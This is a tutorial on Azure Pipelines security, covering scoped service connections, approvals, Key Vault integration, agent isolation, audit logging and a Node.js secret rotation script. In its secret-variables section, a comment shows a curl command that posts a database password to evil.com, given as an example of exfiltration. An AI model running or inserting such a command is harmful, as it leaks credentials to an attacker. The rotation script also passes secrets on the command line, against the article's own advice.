Securing Azure Pipelines: Service Connections and Secret Management
Secure Azure Pipelines with service connection approvals, Key Vault integration, secret rotation, and pipeline security best practices
Securing Azure Pipelines: Service Connections and Secret Management
Azure Pipelines is powerful, but that power comes with serious security responsibilities. A misconfigured service connection or a leaked secret can hand an attacker the keys to your entire cloud infrastructure. This article covers the full spectrum of pipeline security — from service connection lockdown and Key Vault integration to audit logging and tampering prevention — with practical examples geared toward Node.js deployments.
Prerequisites
- An Azure DevOps organization with at least one project
- An Azure subscription with Contributor or Owner access
- Familiarity with YAML pipeline syntax
- Node.js 18+ installed locally
- Azure CLI installed and authenticated
- Basic understanding of Azure RBAC and service principals
Service Connection Types and Security
Service connections are the bridge between Azure Pipelines and external services. Each type carries different risk profiles, and understanding them is the first step toward securing your pipelines.
Azure Resource Manager (ARM) connections are the most common and the most dangerous when misconfigured. They come in several flavors:
- Workload Identity Federation (recommended) — Uses federated credentials with no stored secrets. The pipeline authenticates using an OIDC token exchange, eliminating the risk of credential leakage entirely.
- Service Principal with secret — A client ID and secret stored in Azure DevOps. The secret expires and must be rotated. If someone exports your pipeline definition, they cannot see the secret directly, but anyone with admin access to the service connection can.
- Managed Identity — Available only for self-hosted agents running on Azure VMs. The identity is tied to the VM, reducing secret sprawl.
- Service Principal with certificate — More secure than a shared secret, but the certificate itself becomes a management burden.
Other connection types include Docker Registry, npm, NuGet, SSH, and generic service connections. Every one of these can store credentials, and every one should be treated as a high-value target.
The rule is simple: use Workload Identity Federation whenever possible. It is the only option that eliminates stored secrets from the equation entirely.
Creating Secure Service Connections
When you create a service connection, Azure DevOps gives you a checkbox that most people blindly enable: "Grant access permission to all pipelines." Do not check this box. Ever.
Here is how to create a properly scoped ARM service connection using the Azure CLI:
# Create a service principal with limited scope
az ad sp create-for-rbac \
--name "sp-myapp-production-deploy" \
--role "Contributor" \
--scopes "/subscriptions/<sub-id>/resourceGroups/myapp-production-rg" \
--years 1
# Output:
# {
# "appId": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
# "displayName": "sp-myapp-production-deploy",
# "password": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
# "tenant": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
# }
Notice the --scopes flag. This limits the service principal to a single resource group. A common mistake is granting Contributor at the subscription level — that gives your pipeline access to every resource in the subscription, including resources it has no business touching.
For Workload Identity Federation, you create the service connection through the Azure DevOps UI and select "Workload Identity federation (automatic)" or configure it manually:
# Create a federated credential for the service principal
az ad app federated-credential create \
--id <app-object-id> \
--parameters '{
"name": "ado-federation",
"issuer": "https://vstoken.dev.azure.com/<org-id>",
"subject": "sc://myorg/myproject/my-service-connection",
"audiences": ["api://AzureADTokenExchange"]
}'
After creating the connection, immediately configure pipeline permissions so that only specific pipelines can use it.
Pipeline Permissions and Approvals
Service connection permissions work at two levels: who can manage the connection, and which pipelines can use it.
Navigate to Project Settings > Service connections > (your connection) > Security and you will see:
- User permissions — Who can use, administer, or view the connection
- Pipeline permissions — Which pipelines are authorized to reference this connection
Restrict pipeline permissions to only the pipelines that genuinely need the connection. For production service connections, go one step further and add approval checks:
- Open the service connection
- Click "Approvals and checks"
- Add an "Approvals" check
- Specify one or more approvers who must sign off before any pipeline run uses this connection
You can also add these checks:
- Business hours — Prevent production deployments at 3 AM on a Friday
- Branch control — Only allow the connection to be used from specific branches (e.g.,
refs/heads/main) - Required template — Force pipelines to use a specific template, ensuring security controls cannot be bypassed
Branch control is particularly important. Without it, a developer could create a feature branch, modify the pipeline YAML to deploy to production, and bypass your entire release process.
Secret Variables and Variable Groups
Pipeline variables marked as secret are encrypted at rest and masked in logs. But they are not invisible to the pipeline itself — any script step can read them and exfiltrate them if it wants to.
variables:
- name: DB_PASSWORD
value: $(db-password) # Pulled from a variable group or defined as secret
steps:
- script: |
echo "Password is: $(DB_PASSWORD)"
# Azure DevOps will mask this in logs as ***
# But nothing stops a malicious script from:
# curl -X POST https://evil.com/capture -d "$(DB_PASSWORD)"
displayName: 'Use secret variable'
This is why pipeline permissions matter. If an untrusted pipeline can access a variable group containing production secrets, those secrets are compromised regardless of masking.
Variable groups should follow the principle of least privilege:
# Link only the variable group needed for this environment
variables:
- group: 'myapp-staging-secrets'
# NOT: 'myapp-production-secrets' in a staging pipeline
Lock variable groups with pipeline permissions the same way you lock service connections.
Azure Key Vault Integration
Variable groups backed by Azure Key Vault are the preferred approach for secret management. Secrets live in Key Vault, not in Azure DevOps, meaning you get centralized rotation, access policies, and audit logging.
Setting up a Key Vault-linked variable group:
- Create a Key Vault and add your secrets
- Grant the service connection's service principal the Key Vault Secrets User role on the vault
- In Azure DevOps, create a variable group and toggle "Link secrets from an Azure key vault"
- Select your service connection and vault
- Choose which secrets to expose
In your pipeline, reference Key Vault secrets just like regular variable group secrets:
variables:
- group: 'keyvault-myapp-production'
steps:
- task: AzureKeyVault@2
inputs:
azureSubscription: 'production-service-connection'
KeyVaultName: 'kv-myapp-prod'
SecretsFilter: 'DbConnectionString,ApiKey,JwtSecret'
RunAsPreJob: true
displayName: 'Fetch secrets from Key Vault'
- script: |
echo "Deploying with Key Vault secrets loaded"
node deploy.js
displayName: 'Deploy application'
env:
DB_CONNECTION: $(DbConnectionString)
API_KEY: $(ApiKey)
JWT_SECRET: $(JwtSecret)
The RunAsPreJob: true setting fetches secrets before any other step runs, making them available to the entire job. The SecretsFilter limits which secrets are pulled — do not use * in production.
Managing Secrets in YAML Pipelines
YAML pipelines store their definition in source control, which is both a strength (version history, code review) and a risk (secrets accidentally committed).
Never hardcode secrets in YAML files. Here is the correct pattern:
# azure-pipelines.yml
trigger:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
variables:
- group: 'myapp-secrets'
- name: nodeVersion
value: '20.x'
stages:
- stage: Build
jobs:
- job: BuildAndTest
steps:
- task: NodeTool@0
inputs:
versionSpec: '$(nodeVersion)'
- script: npm ci
displayName: 'Install dependencies'
- script: npm test
displayName: 'Run tests'
env:
DB_CONNECTION: $(TestDbConnection)
NODE_ENV: test
- stage: Deploy
dependsOn: Build
condition: and(succeeded(), eq(variables['Build.SourceBranch'], 'refs/heads/main'))
jobs:
- deployment: DeployProduction
environment: 'production'
strategy:
runOnce:
deploy:
steps:
- script: |
npm ci --production
node scripts/migrate.js
pm2 restart myapp
displayName: 'Deploy to production'
env:
DB_CONNECTION: $(ProdDbConnection)
API_KEY: $(ProdApiKey)
Notice that secrets are passed to scripts via the env block, not interpolated directly into the command line. This prevents them from appearing in process listings and reduces the risk of accidental logging.
Pipeline Agent Security
Self-hosted agents introduce their own set of risks. The agent runs on infrastructure you control, which means it has access to whatever that infrastructure has access to.
Key considerations for self-hosted agents:
- Dedicated agents per environment — Do not use the same agent pool for development and production builds. A compromised dev build could access production credentials cached on the agent.
- Ephemeral agents — Use scale-set agents or container-based agents that are destroyed after each run. This prevents credential persistence between builds.
- Network isolation — Place production agents in a network segment that can only reach production resources. Use NSGs or firewall rules to enforce this.
- Minimal tooling — Install only what the build needs. Every extra tool is an extra attack surface.
For Microsoft-hosted agents, the security model is simpler — each run gets a fresh VM that is destroyed afterward. But you trade control for convenience, and you cannot restrict network access from these agents.
# Use a dedicated agent pool for production deployments
pool:
name: 'production-agents'
demands:
- agent.os -equals Linux
- docker
Checkout and Artifact Tampering Prevention
Pipeline source code is fetched during the checkout step. By default, the pipeline checks out the repository that contains the YAML file, but it can check out additional repositories. Each checkout is a potential injection point.
Protect against tampering:
steps:
- checkout: self
clean: true
fetchDepth: 1
persistCredentials: false # Do not leave Git credentials on disk
# Verify artifact integrity before deployment
- script: |
sha256sum -c checksums.sha256
if [ $? -ne 0 ]; then
echo "##vso[task.logissue type=error]Artifact integrity check failed"
exit 1
fi
displayName: 'Verify artifact checksums'
Setting persistCredentials: false removes the OAuth token from the .git/config after checkout. This prevents subsequent steps from using the token to push malicious changes back to the repository.
For multi-repo checkout scenarios, limit which repositories a pipeline can access through project-level settings and require explicit authorization for each repository.
Pipeline Decorators for Security Policies
Pipeline decorators are organization-level extensions that inject steps into every pipeline automatically. They are the enforcement mechanism for security policies that cannot be optional.
A decorator might inject:
- A credential scanning step before any build
- A container image scanning step before any deployment
- An audit logging step at the start and end of every run
Decorators are defined as Azure DevOps extensions and installed at the organization level. Here is a simplified decorator structure:
{
"contributions": [
{
"id": "security-scan-decorator",
"type": "ms.azure-pipelines.pipeline-decorator",
"targets": ["ms.azure-pipelines-agent-job.pre-job-steps"],
"properties": {
"template": "security-scan.yml",
"targetsCondition": "always()"
}
}
]
}
The targetsCondition of always() ensures the decorator runs on every pipeline, regardless of what the pipeline author specifies. This is how you enforce organization-wide security scanning without trusting individual teams to add it themselves.
Secure Files Library
The Secure Files library stores files like certificates, provisioning profiles, and SSH keys in Azure DevOps with encryption at rest. Files can only be consumed by pipelines that have been explicitly authorized.
steps:
- task: DownloadSecureFile@1
name: sslCert
displayName: 'Download SSL certificate'
inputs:
secureFile: 'myapp-production.pfx'
- script: |
node scripts/deploy-with-cert.js
displayName: 'Deploy with certificate'
env:
CERT_PATH: $(sslCert.secureFilePath)
CERT_PASSWORD: $(CertificatePassword)
Like service connections and variable groups, secure files should have pipeline permissions locked down and approval checks configured for sensitive files.
Audit Logging for Pipeline Activities
Azure DevOps generates audit logs for pipeline-related events including service connection creation, variable group modifications, pipeline permission changes, and manual approvals. These logs are critical for incident response and compliance.
Access audit logs through Organization Settings > Auditing or query them programmatically:
var https = require("https");
var orgName = "myorg";
var pat = process.env.AZURE_DEVOPS_PAT;
function getAuditLogs(startDate, endDate, callback) {
var auth = Buffer.from(":" + pat).toString("base64");
var options = {
hostname: "auditservice.dev.azure.com",
path: "/" + orgName + "/_apis/audit/auditlog?startTime=" +
encodeURIComponent(startDate) +
"&endTime=" + encodeURIComponent(endDate) +
"&api-version=7.1-preview.1",
method: "GET",
headers: {
"Authorization": "Basic " + auth,
"Content-Type": "application/json"
}
};
var req = https.request(options, function(res) {
var body = "";
res.on("data", function(chunk) { body += chunk; });
res.on("end", function() {
var data = JSON.parse(body);
callback(null, data.decoratedAuditLogEntries);
});
});
req.on("error", function(err) { callback(err); });
req.end();
}
// Query audit logs for the last 24 hours
var now = new Date();
var yesterday = new Date(now.getTime() - 86400000);
getAuditLogs(yesterday.toISOString(), now.toISOString(), function(err, entries) {
if (err) {
console.error("Failed to fetch audit logs:", err.message);
return;
}
// Filter for security-relevant events
var securityEvents = entries.filter(function(entry) {
return entry.actionId.indexOf("Security") !== -1 ||
entry.actionId.indexOf("ServiceConnection") !== -1 ||
entry.actionId.indexOf("VariableGroup") !== -1;
});
securityEvents.forEach(function(event) {
console.log("[%s] %s - %s by %s",
event.timestamp,
event.actionId,
event.details,
event.actorDisplayName
);
});
});
Set up alerts for critical events: service connection creation, pipeline permission changes, and approval overrides. These are early indicators of either legitimate changes that need review or active compromise.
RBAC for Pipeline Resources
Azure DevOps RBAC for pipelines operates at multiple levels: organization, project, folder, and individual pipeline. The most common mistake is granting broad permissions at the project level when they should be scoped to specific folders or pipelines.
Key roles:
- Reader — Can view pipeline definitions and runs but cannot queue builds
- User — Can queue builds and view definitions
- Build Administrator — Can manage pipeline definitions, permissions, and agent pools
- Project Administrator — Full control over all pipeline resources
For service connections and environments, create custom security groups:
Production Deployers → Can use production service connections
Staging Deployers → Can use staging service connections
Pipeline Admins → Can create/modify service connections
Never add individual users directly to resource permissions. Always use groups, because when someone leaves the team, you update one group membership instead of hunting through dozens of resource permissions.
Pipeline Isolation and Security Gates
Environments in Azure DevOps provide a deployment target abstraction with built-in approval and check mechanisms. Use them to create security gates that prevent unauthorized deployments.
stages:
- stage: DeployStaging
jobs:
- deployment: DeployToStaging
environment: 'staging'
strategy:
runOnce:
deploy:
steps:
- script: echo "Deploying to staging"
- stage: SecurityGate
dependsOn: DeployStaging
jobs:
- job: SecurityScan
steps:
- script: |
npm audit --audit-level=high
if [ $? -ne 0 ]; then
echo "##vso[task.logissue type=error]High severity vulnerabilities found"
exit 1
fi
displayName: 'Security audit'
- script: |
npx snyk test --severity-threshold=high
displayName: 'Snyk vulnerability scan'
- stage: DeployProduction
dependsOn: SecurityGate
condition: succeeded()
jobs:
- deployment: DeployToProduction
environment: 'production' # Has manual approval configured
strategy:
runOnce:
deploy:
steps:
- script: echo "Deploying to production"
Configure the production environment with:
- Manual approval from a designated approver
- Branch control limiting deployments to
mainonly - Business hours check to prevent off-hours deployments
- Exclusive lock to prevent concurrent deployments
Complete Working Example
Here is a complete, production-ready pipeline configuration for a Node.js application with Key Vault integration, service connection approvals, and a secret rotation pattern.
Pipeline YAML
# azure-pipelines.yml
trigger:
branches:
include:
- main
paths:
exclude:
- '*.md'
- 'docs/**'
pr:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
variables:
- name: nodeVersion
value: '20.x'
- name: appName
value: 'myapp-api'
stages:
# ── Build & Test ───────────────────────────────
- stage: Build
displayName: 'Build and Test'
jobs:
- job: BuildJob
steps:
- checkout: self
clean: true
fetchDepth: 1
persistCredentials: false
- task: NodeTool@0
inputs:
versionSpec: '$(nodeVersion)'
displayName: 'Install Node.js'
- script: npm ci
displayName: 'Install dependencies'
- script: npm audit --audit-level=high
displayName: 'Security audit'
continueOnError: false
- script: npm test
displayName: 'Run tests'
env:
NODE_ENV: test
- script: |
mkdir -p $(Build.ArtifactStagingDirectory)/app
cp -r src package.json package-lock.json $(Build.ArtifactStagingDirectory)/app/
cd $(Build.ArtifactStagingDirectory)/app && npm ci --production
cd $(Build.ArtifactStagingDirectory) && tar czf app.tar.gz app/
sha256sum app.tar.gz > checksums.sha256
displayName: 'Package application'
- publish: $(Build.ArtifactStagingDirectory)
artifact: drop
displayName: 'Publish artifact'
# ── Deploy to Staging ──────────────────────────
- stage: Staging
displayName: 'Deploy to Staging'
dependsOn: Build
condition: and(succeeded(), eq(variables['Build.SourceBranch'], 'refs/heads/main'))
jobs:
- deployment: DeployStaging
environment: 'staging'
strategy:
runOnce:
deploy:
steps:
- task: AzureKeyVault@2
inputs:
azureSubscription: 'staging-service-connection'
KeyVaultName: 'kv-myapp-staging'
SecretsFilter: 'DbConnectionString,ApiKey,JwtSecret'
RunAsPreJob: true
displayName: 'Fetch staging secrets'
- download: current
artifact: drop
- script: |
cd $(Pipeline.Workspace)/drop
sha256sum -c checksums.sha256
displayName: 'Verify artifact integrity'
- task: AzureCLI@2
inputs:
azureSubscription: 'staging-service-connection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
az webapp deploy \
--resource-group myapp-staging-rg \
--name $(appName)-staging \
--src-path $(Pipeline.Workspace)/drop/app.tar.gz \
--type zip
displayName: 'Deploy to staging App Service'
- script: |
sleep 30
STATUS=$(curl -s -o /dev/null -w "%{http_code}" https://$(appName)-staging.azurewebsites.net/health)
if [ "$STATUS" != "200" ]; then
echo "##vso[task.logissue type=error]Health check failed with status $STATUS"
exit 1
fi
echo "Health check passed"
displayName: 'Smoke test'
# ── Deploy to Production ───────────────────────
- stage: Production
displayName: 'Deploy to Production'
dependsOn: Staging
condition: succeeded()
jobs:
- deployment: DeployProduction
environment: 'production' # Manual approval + branch control configured
strategy:
runOnce:
deploy:
steps:
- task: AzureKeyVault@2
inputs:
azureSubscription: 'production-service-connection'
KeyVaultName: 'kv-myapp-prod'
SecretsFilter: 'DbConnectionString,ApiKey,JwtSecret,SessionSecret'
RunAsPreJob: true
displayName: 'Fetch production secrets'
- download: current
artifact: drop
- script: |
cd $(Pipeline.Workspace)/drop
sha256sum -c checksums.sha256
displayName: 'Verify artifact integrity'
- task: AzureCLI@2
inputs:
azureSubscription: 'production-service-connection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
# Deploy to staging slot first
az webapp deploy \
--resource-group myapp-production-rg \
--name $(appName) \
--slot staging \
--src-path $(Pipeline.Workspace)/drop/app.tar.gz \
--type zip
# Warm up the staging slot
sleep 30
curl -s https://$(appName)-staging.azurewebsites.net/health
# Swap slots
az webapp deployment slot swap \
--resource-group myapp-production-rg \
--name $(appName) \
--slot staging \
--target-slot production
displayName: 'Blue-green deploy to production'
- script: |
STATUS=$(curl -s -o /dev/null -w "%{http_code}" https://$(appName).azurewebsites.net/health)
if [ "$STATUS" != "200" ]; then
echo "##vso[task.logissue type=error]Production health check failed"
echo "##vso[task.logissue type=warning]Initiating rollback"
az webapp deployment slot swap \
--resource-group myapp-production-rg \
--name $(appName) \
--slot staging \
--target-slot production
exit 1
fi
echo "Production deployment verified"
displayName: 'Verify and rollback on failure'
Secret Rotation Script
This Node.js script rotates secrets in Azure Key Vault and can be triggered on a schedule or as part of a maintenance pipeline:
var crypto = require("crypto");
var https = require("https");
var childProcess = require("child_process");
function generateSecret(length) {
return crypto.randomBytes(length).toString("base64url");
}
function execAzCommand(command, callback) {
childProcess.exec("az " + command, function(error, stdout, stderr) {
if (error) {
callback(new Error("az command failed: " + stderr));
return;
}
try {
var result = JSON.parse(stdout);
callback(null, result);
} catch (e) {
callback(null, stdout.trim());
}
});
}
function rotateKeyVaultSecret(vaultName, secretName, callback) {
var newValue = generateSecret(32);
var setCmd = 'keyvault secret set' +
' --vault-name ' + vaultName +
' --name ' + secretName +
' --value ' + newValue +
' --tags rotatedAt=' + new Date().toISOString().split("T")[0];
execAzCommand(setCmd, function(err, result) {
if (err) {
console.error("Failed to rotate " + secretName + ":", err.message);
callback(err);
return;
}
console.log("Rotated %s (version: %s)", secretName, result.id);
callback(null, {
name: secretName,
version: result.id,
rotatedAt: new Date().toISOString()
});
});
}
function rotateAllSecrets(vaultName, secretNames, callback) {
var results = [];
var errors = [];
var completed = 0;
secretNames.forEach(function(name) {
rotateKeyVaultSecret(vaultName, name, function(err, result) {
completed++;
if (err) {
errors.push({ name: name, error: err.message });
} else {
results.push(result);
}
if (completed === secretNames.length) {
if (errors.length > 0) {
console.error("Rotation errors:", JSON.stringify(errors, null, 2));
}
console.log("Rotation complete: %d succeeded, %d failed",
results.length, errors.length);
callback(errors.length > 0 ? errors : null, results);
}
});
});
}
// Rotate secrets that should be cycled regularly
var vaultName = process.env.KEY_VAULT_NAME || "kv-myapp-prod";
var secretsToRotate = [
"JwtSecret",
"SessionSecret",
"ApiKey",
"WebhookSigningKey"
];
rotateAllSecrets(vaultName, secretsToRotate, function(errors, results) {
if (errors) {
process.exit(1);
}
console.log("All secrets rotated successfully");
console.log(JSON.stringify(results, null, 2));
});
Health Check Endpoint
The health check endpoint referenced in the pipeline should validate that the application can reach its dependencies:
var express = require("express");
var router = express.Router();
router.get("/health", function(req, res) {
var checks = {
status: "healthy",
timestamp: new Date().toISOString(),
version: process.env.BUILD_NUMBER || "local",
checks: {}
};
// Check database connectivity
var db = require("../models/dataAccess");
db.ping(function(err) {
checks.checks.database = err ? "unhealthy" : "healthy";
// Check external API reachability
var https = require("https");
var apiReq = https.get(process.env.API_HEALTH_URL || "https://api.example.com/health", function(apiRes) {
checks.checks.externalApi = apiRes.statusCode === 200 ? "healthy" : "degraded";
finalize();
});
apiReq.on("error", function() {
checks.checks.externalApi = "unhealthy";
finalize();
});
apiReq.setTimeout(5000, function() {
apiReq.destroy();
checks.checks.externalApi = "timeout";
finalize();
});
});
function finalize() {
var allHealthy = Object.keys(checks.checks).every(function(key) {
return checks.checks[key] === "healthy";
});
checks.status = allHealthy ? "healthy" : "degraded";
var statusCode = allHealthy ? 200 : 503;
res.status(statusCode).json(checks);
}
});
module.exports = router;
Common Issues and Troubleshooting
1. "The service connection could not be found"
This happens when a pipeline references a service connection it does not have permission to use. Go to the service connection's pipeline permissions and explicitly authorize the pipeline. If you recently renamed the pipeline or moved it to a different folder, the authorization may have been lost.
2. "Access denied: The caller does not have permission to perform action on resource"
The service principal behind the service connection lacks the required Azure RBAC role. Check the scope and role assignment:
az role assignment list --assignee <service-principal-app-id> --output table
Common fix: the service principal has Contributor on the wrong resource group, or the resource group name has changed since the role was assigned.
3. "Key Vault secret retrieval failed with status 403"
The service principal does not have Key Vault access. With Azure RBAC (recommended over access policies):
az role assignment create \
--assignee <service-principal-app-id> \
--role "Key Vault Secrets User" \
--scope "/subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault-name>"
If using access policies instead of RBAC, ensure the principal has "Get" and "List" permissions for secrets.
4. "Pipeline run was rejected because it uses a protected resource"
This means an approval check is blocking the run. Check the "Checks" tab on the pipeline run to see which resource requires approval and who the designated approvers are. If you are the approver, you can approve directly from the pipeline run page. If the approver has left the organization, update the approval check configuration on the resource.
5. "Secret variables are empty or not populated in scripts"
Secret variables must be explicitly mapped to environment variables in script tasks. They are not automatically available as environment variables for security reasons:
# Wrong - secret will be empty
- script: echo $MY_SECRET
# Correct - explicitly map the secret
- script: echo $MY_SECRET
env:
MY_SECRET: $(mySecretVariable)
6. "Workload Identity Federation token exchange failed"
The federated credential's subject, issuer, or audience does not match what Azure DevOps sends. Double-check the service connection name in the subject claim matches exactly, including the organization and project name casing.
Best Practices
Use Workload Identity Federation over service principal secrets. Federation eliminates stored credentials entirely. No secrets to rotate, no secrets to leak. This should be the default for all new ARM service connections.
Scope service principals to the minimum required resources. A service principal for deploying a single App Service does not need Contributor access to the entire subscription. Use resource group or even resource-level scoping.
Never grant pipeline access to all service connections or variable groups. Disable "Grant access permission to all pipelines" on every protected resource. Authorize pipelines individually and review authorizations quarterly.
Back variable groups with Azure Key Vault. Key Vault provides centralized secret management, rotation support, access policies, and audit logging that Azure DevOps variable groups alone cannot match.
Enforce branch control on production resources. Configure branch control checks on production service connections and environments so that only the
mainbranch can trigger production deployments. This prevents end-runs around your release process.Implement artifact integrity verification. Generate checksums during the build stage and verify them before deployment. This catches tampering between stages, whether from a compromised agent or a supply chain attack.
Use pipeline decorators for organization-wide security policies. Decorators ensure that security scanning, credential detection, and audit logging happen on every pipeline without relying on individual teams to add these steps.
Rotate secrets on a schedule. Automated secret rotation through Key Vault reduces the window of exposure if a secret is compromised. Set up a maintenance pipeline that rotates secrets monthly and tags them with rotation dates.
Audit service connection usage regularly. Review audit logs for unexpected service connection access, permission changes, and failed authentication attempts. Set up alerts for critical events.
Isolate agent pools by environment. Production workloads should run on dedicated agents that are network-isolated from development and staging environments. Use ephemeral agents where possible to prevent credential persistence.
References
- Azure Pipelines Security Best Practices — Microsoft's official security guidance
- Manage Service Connections — Service connection configuration and types
- Use Azure Key Vault Secrets in Azure Pipelines — Key Vault integration walkthrough
- Pipeline Approvals and Checks — Configuring approval gates
- Workload Identity Federation for Azure Pipelines — Federation setup guide
- Azure DevOps Audit Logging — Audit log access and streaming